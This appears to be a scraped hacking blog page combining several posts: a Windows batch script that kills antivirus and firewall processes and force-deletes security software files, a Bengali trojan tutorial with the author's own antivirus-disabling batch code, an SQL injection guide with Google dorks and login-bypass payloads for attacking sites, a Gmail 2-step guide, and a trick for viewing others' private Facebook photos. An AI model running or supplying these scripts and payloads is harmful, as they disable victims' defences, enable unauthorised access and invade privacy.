cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
cls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
del /Q /F C:\Program Files\kasper~1\*.exe
cls
del /Q /F C:\Program Files\trojan~1\*.exe
del /Q /F C:\Program Files\f-prot95\*.dll
del /Q /F C:\Program Files\tbav\*.dat
cls
del /Q /F C:\Program Files\avpersonal\*.vdf
del /Q /F C:\Program Files\Norton~1\*.cnt
del /Q /F C:\Program Files\Mcafee\*.*
cls
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
del /Q /F C:\Program Files\Norton~1\*.*
cls
del /Q /F C:\Program Files\avgamsr\*.exe
del /Q /F C:\Program Files\avgamsvr\*.exe
del /Q /F C:\Program Files\avgemc\*.exe
cls
del /Q /F C:\Program Files\avgcc\*.exe
del /Q /F C:\Program Files\avgupsvc\*.exe
del /Q /F C:\Program Files\grisoft
del /Q /F C:\Program Files\nood32krn\*.exe
del /Q /F C:\Program Files\nood32\*.exe
cls
del /Q /F C:\Program Files\nod32
del /Q /F C:\Program Files\nood32
del /Q /F C:\Program Files\kav\*.exe
del /Q /F C:\Program Files\kavmm\*.exe
del /Q /F C:\Program Files\kaspersky\*.*
cls
del /Q /F C:\Program Files\ewidoctrl\*.exe
del /Q /F C:\Program Files\guard\*.exe
del /Q /F C:\Program Files\ewido\*.exe
cls
del /Q /F C:\Program Files\pavprsrv\*.exe
del /Q /F C:\Program Files\pavprot\*.exe
del /Q /F C:\Program Files\avengine\*.exe
cls
del /Q /F C:\Program Files\apvxdwin\*.exe
del /Q /F C:\Program Files\webproxy\*.exe
del /Q /F C:\Program Files\panda software\*.*
rem --
TROJAN INJECTING AND TROJAN BACKDOR.......
ট্রোজান আর ব্যাক ডোর হল দুটি পদ্ধতি যার মাধ্যমে একজন হ্যাকার কোন সিস্টেম এ প্রবেশ করতে পারেন ।সাধারনত ব্যাক ডোর বা ট্রোজান একটি সিস্টেম এ অন্য কোন প্রোগ্রাম এর মাধ্যমে প্রবেশ করে ।ইথিকাল হ্যাকার সাধারন ভাবে পরীক্ষা করার জন্য এগুলো ব্যাবহার করে থাকেন । এই দুটি হল ম্যালওয়ার এর একটি রুপ যা অন্য কোন সার্ভার এ অন্য ফাইল এর মাধ্যমে যাবার চেষ্টা করে ।
আর ব্যাক ডোর বলতে বোঝানো হয় একটি পথ তৈরি করা যার মাধ্যমে ট্রোজান কোন সিস্টেম এ প্রবেশ করে। সাধারনত ট্রোজান কোন অন্য ছবি বা মিউজিক ফাইল এর মাধ্যমে ছড়িয়ে যায় । এতে Steganography পদ্ধতি টি ব্যাবহার করা হয় । এটি সম্পর্কে না যানলে আমি এ নিয়ে লিখেছি । সেটি পড়ে নিবেন ।। সাধারন ভাবে ট্রোজান ছড়ানোর সবথেকে সহজ উপায় হল ব্যাচ ফাইল বা একে .exe তে রুপান্তর করে ইন্সটলার এর মাধ্যমে ছড়িয়ে দেয়া । এতে হ্যাকার রা বিভিন্ন ধরনের GUI ব্যাবহার করেন অন্য দের আকৃষ্ট করার জন্য ।কয়েকটি কমন ট্রোজান :
BackOrifice
Deep Throat
NetBus
Whack a mole
Girlfriend
Masters Paradise
এগুলর মধ্যে সবথেকে বিপদজনক হচ্ছে Girlfriend এবং Netbus । কারন এগুলো ব্যাচ ফাইল এর মাধ্যমে তৈরি করা যায় । এবং কোডের কয়েকটি লাইন পরিবর্তন করে দিলেই দুর্ধর্ষ ভাইরাস এ পরিনত হয় । আপনি যদি হ্যাকার হতে চান বা সিকিউরিটি নিয়ে কাজ করতে চান আপনাকে অবশ্যই এগুলো নিয়ে কাজ করতে হবে । কিন্তু নিজের কম্পিউটার এ গুলো নিয়ে ঘাটাঘাটি না করে কোন ভার্চুয়াল পরিবেশ তৈরি করাই ভাল । যেমন যারা Comodo এর ভার্চুয়াল সিকিউরিটি ব্যাবহার করেন তারা যানেন । এই ভাইরাস গুলো নিয়ে কাজ করা কতটা বিপদজনক ।
ট্রোজান এর প্রকারভেদ
বিভিন্ন ধরেনের ট্রোজান আছে । সেগুলর কয়েকটি নিচে তুলে ধরা হল :
Remote Access Trojans : কোন সিস্টেম এ রিমোট অ্যাক্সেস পেতে ব্যাবহার করা হয়
Data Sending Trijans : এটি সাধারনত ডাটা খুঁজে বের করে হ্যাকার এর কাছে তা পাঠিয়ে দেয় ।
Destructive Trojans: এর সাহায্যে কম্পিউটার এর ক্ষতি করা হয় ।
FTP trojans: এটিকে ব্যাবহার করতে হ্যাকার রা port 21 ব্যাবহার করে থাকেন ।
SSDT: এটির পূর্ণরূপ আপনারা কাজ শুনলেই বুঝতে পারবেন । এর মাধ্যমে কোন নির্দিষ্ট বা অনেকগুল antivirus প্রোগ্রাম কে অকেজ করে দেয়া হয় ।
কয়েকটি ট্রোজান প্রোগ্রাম
Troj_OAJ
এই ট্রোজান টি যে কোন নোটপ্যাড ফাইল কে টারগেট করে । এরপর সেটিকে word ফরমেট পরিবর্তন করে note.com এ নিয়ে যায় । এরপর সেটি windows এর নোটপ্যাড ফোল্ডার এ কপি হয় । এরপর আপনি যতবার নোটপ্যাড খুলবেন ততবার এই ভাইরাস টি আক্টিভ হবে ।
Donald Duck
এটি একটি ব্যাক ডোর ট্রোজান । এটি হ্যাকার কে যেকোনো সিস্টেম এ পুরপরি নিয়ন্ত্রন এনে দেয় । এটার সাথে একটি কি লগার এবং রেজিস্ট্রি এডিট করার প্রগ্রাম থাকে ।এর সাহায্যে সিডি বা ডিভিডি রম খোলা বা বন্ধ করাও সম্ভব হয় । এটি ইঞ্জেক্ট করতে হ্যাকার23476 ও ২৩৪৭৭ ব্যাবহার করে থাকেন
CyberSpy
এটি মূলত একটি স্পাই প্রোগ্রাম । এটি রেজিস্ট্রি তে নিজেকে এন্ট্রি করে নেয়। যার ফলে আন্টিভাইরাস দিয়ে ডিলিট করে দিলেও কম্পিউটার রিবুট করলে আবার এটি আক্টিভ হয়ে যায় ।
Firekill 2000
এই ট্রোজান টি মারাত্তক । এটি সব ধরনের ফায়ারওয়াল , এন্টিভাইরাস কে disable করে দিতে সক্ষম । এমনকি এটি সিকিউরিটি সফটওয়্যার এর নিরাপত্তা কে ধ্বংস করতে .dll ফাইল কে ডিলিট করে দেয় । তখন সিস্টেম আবার সেটআপ দিতে হয় ।
এছাড়া আর অনেক ট্রোজান প্রোগ্রাম আছে । অনেক ট্রোজান Netcat এর সাহায্যে launch করা হয় । আবার অনেক ট্রোজান সার্ভার রুটিং করে ইঞ্জেক্ট করা হয় ।
একটি ট্রোজান ভাইরাস
এটি আমার নিজের কোড করা একটি ছোট ট্রোজান । এটি এন্টিভাইরাস এর সিকিউরিটি কে রুখে দিতে পারবে । এটি মূলত আপনার ওয়িন্দএস এর ফায়ার ওয়াল ও এন্টিভাইরাস এর safe guard কে রুখে দেবে । এটির ইন্টারফেস সবুজ রঙের।
@ echo off
_Rashed Hasan_
∙ rem –
colour Db 03
∙ rem Permanently Kill Anti-Virus
∙ net stop “Security Center”
netsh firewall set opmode mode=disable ∙ tskill /A av* ∙
tskill /A fire*
tskill /A [...].
_BCA_
আপনাদেরকে আর ও একটি বিধ্বংসী ট্রোজান এর লিঙ্ক দিতে পারি । কিন্তু সেটি কম্পিউটার এ রান করবেন না । একটি সহজ ট্রিক হচ্ছে কপি পেস্টিং সাইট যেমন http://www.pastebin.com এ যেয়ে পেস্ট করে সেভ করবেন। সেটি যদি কোন ভাইরাস হয় তবে দেখতে পাবেন আপনার এন্টিভাইরাস সিকিউরিটি warning দেবে। আর সেই লিঙ্ক এ প্রবেশ করতে গেলে আপনার ব্রাউযার থেমে যাবে ।
এই ভাইরাস টি কোন অবস্থাতেই রান করবেন না । এটি ভারতের একজন সিকিউরিটি এক্সপার্ট এর কোড করা
http://www.breakthesecurity.com/2010/12/how-to-disabledelete-your-victims.html
বাঁচার কিছু উপায়
> আপনি যে এন্টিভাইরাস ব্যাবহার করে থাকুন না কেন সেটি আপ টু ডেট থাকতে হবে ।
> সন্দেহ জনক কোন টুল বা লিঙ্ক এ ক্লিক করবেন না ।
> আপনার antivirus এর পাশাপাশি anti spam ও anti rootkit ব্যাবহার করবেন । আমি বলব অ্যান্টিভাইরাস এর সাথে আপনি kaspersky এর TDS killer টুল টী ব্যাবহার করতে পারেন । এটি পুরো পুরি পোর্টেবল একটি টুল ।
তাহলে আজ এই পর্যন্তই ছিল ।
Manual Sql Injection Attack ?
Hello every one .i am a sabbir.i am a gray hat hacker.
I am going to share with one of the best of my tutorials here .
Now Let's begin!!
Sql injection (aka Sql Injection or Structured Query Language Injection) is the first step in the entry
to exploiting or hacking websites. It is easily done and it is a great starting off point. Unfortunately
most sqli tutorials suck, so that is why I am writing this one. Sqli is just basically injecting queries
into a database or using queries to get authorization bypass as an admin.
Things you should know :
Data is in the columns and the columns are in tables and the tables are in the database .
Just remember that so you understand the rest .
PART 1 - Bypassing Admin log in ?
Gaining auth bypass on an admin account.Most sites vulnerable to this are .asp
First we need 2 find a site, start by opening google.
Now we type our dork: "defenition of dork" 'a search entry for a certain type of site/exploit .ect"
There is a large number of google dork for basic sql injection.
here is the best:
Code:
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"
Now what to do once we get to our site.
the site should look something like this :
ADMIN USERNAME :
PASSWORD :
so what we do here is in the username we always type "Admin"
and for our password we type our sql injection
here is a list of sql injections
Code:
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
So your input should look like this
username:Admin
password:'or'1'='1
that will confuse the site and give you authorisation to enter as admin
If the site is vulnerable than you are in :D
enjoy enjoy enjoy
Strongest way to protect Gmail Account Unhckable 2-step Verification
Today I’m going to tell you about
protecting your Gmail account. Gmail is considered to be one of the
strongest accounts to break into. But recently, it has been proven that
it can be done. We have to be very careful in securing our passwords so
that other networks like Facebook, Orkut and Google Plus are not
compromised as well. Since social networking plays a prominent role in
our life, we have to secure our email accounts with which they are
linked up. The Gmail team has setup a 2 step verification process to
strengthen your account. Here’s how to do it.
The main reason to strengthen your
Google account is that it is a common account for many other services.
With a single Gmail id you are accessing other services of Google like
Android, Google Plus, Adsense, Adwords, Orkut, and a lot other services.
So if you are using all of those services and want to protect your ID,
you should follow this procedure.
Protecting Gmail Using 2-Step Verification :
I will just add some screenshots to
makethe procest understandable. Just follow the simple steps below.
Before getting into the step 2 verification, make sure you have setup
your recovery options. In case you have lost your password, you can get
it back immediately. You can set the recovering options just above the
using 2 step verification option, as shown in below screenshot.
1) Login to your Google Account. You can
Login either from Google.com or Gmail.com and after logging in, Just
click on Account Settings as shown in below screenshot to go to the
options page.
2) Now click on Using Step 2
Verification which is highlighted as number 2 in above click. Then you
will be asked to click on a Start Setup Option in the next page.
3) After that you will be redirected to
another page where you have to enter your mobile details. You can select
the 2ways of setting up your step 2 verification process. One is land
line or Mobile phone conformation and the other is the smart phones
setup (eg: android, blackberry and iPhone). Take a look at the
screenshot below. I have selected the normal phone text verification
process since i am using a normal Samsung Corby TXT mobile.
4) As you can see in the above picture,
the first red mark option is where we have selected our SMS or Voice
Call option and at step 2 you have to enter your mobile number so it
takes you further. I suggest SMS text message as shown in step 3. So
after entering the phone and the option, click on the Send Code option
(4). you will receive a code to your mobile, just enter it and verify.
Click on next to move the next page.
5) This is the page where you are
verified and asked to store some verification backup numbers in case you
lost your number or phone. Just take a screenshot of those numbers and
keep it with you. They are really useful when you have lost your mobile
phone. Take a look at the screenshot below.
6) You have to enter another backup
phone number to move to the next step. Put any friend’s number or your
other alternate number to verify it. Now its done. You can directly
access you turn your Step 2 Verification access.Just click on the Step 2
Verification as seen in below screenshot.
Now Most Important Phase Of Protecting Gmail : Activating Step 2-Verification
7) As you can see in the above
screenshot that all your account sources are verified. Now after click
Turn on 2-Step Verification button above, you will warned that you will
be logged out of all the access which you have from
satishcoolpctips@gmail.com Google account. For a better idea, Look at
the screenshot below.
8 ) Click OK to proceed further. After
clicking OK here your access to the Gmail id which you have secured will
be very strong. Just take a look at the screenshot below.
9)
That’s it.. Now your Gmail account is step 2 verified account. So each
and every time when you want to login your Gmail account, You will be
sent a verification code to your mobile which has to be entered in the
above Enter code : option to access your Gmail services. In this way you
can protect Gmail services which you want. If you want to know more,
then Click here :Tutorial
Remember that you cannot access your GTALK while protecting Gmail
account when step 2 verification ON. you are using the Step
2-Verification process. If you want to chat with your mates, you can
always chat from the Gmail inbuilt chat. That’s all for today, If you
have any queries, please let me know with a simple comment below. Also
please share with us any more ways of protecting Gmail.
View Private Photos on Facebook
- Earlier days many of them contacted me to get the trick to view the private photos of their friends on Facebook.I
know it is very difficult to find out this.After these i have tried
more seriously to know about this and at last i got the trick to view
the photos that secretly saved in their Facebook profile.
Facebook Photo Stalker::
- I have found an application named Facebook Photo Stalker from Facebook that can show the secret photos and other information from anyone who use Facebook and secretly saved his photos.
- It is an application and it is developed by Josh Owns and it is a very useful software for those who like to view photos.
Steps to get Facebook Photo Stalker:
- Go to Photo Stalker Application page
- It shows allow application to access your profile, then click on Allow
- It takes you to the application page as screenshot shown below
- It shows a box to put Friends ID/URL/Name of the person you want to see the photos.
- Click on ‘Click Continue’
- You will see profiles below and select the profile you want to view photos.
- Note about Facebook photo stalker:
- Sometimes it will not work as it does not follow the privacy policy and terms of service.
More Facebook tricks are coming soon…so please keep in touch..
Subscribe to:
Posts (Atom)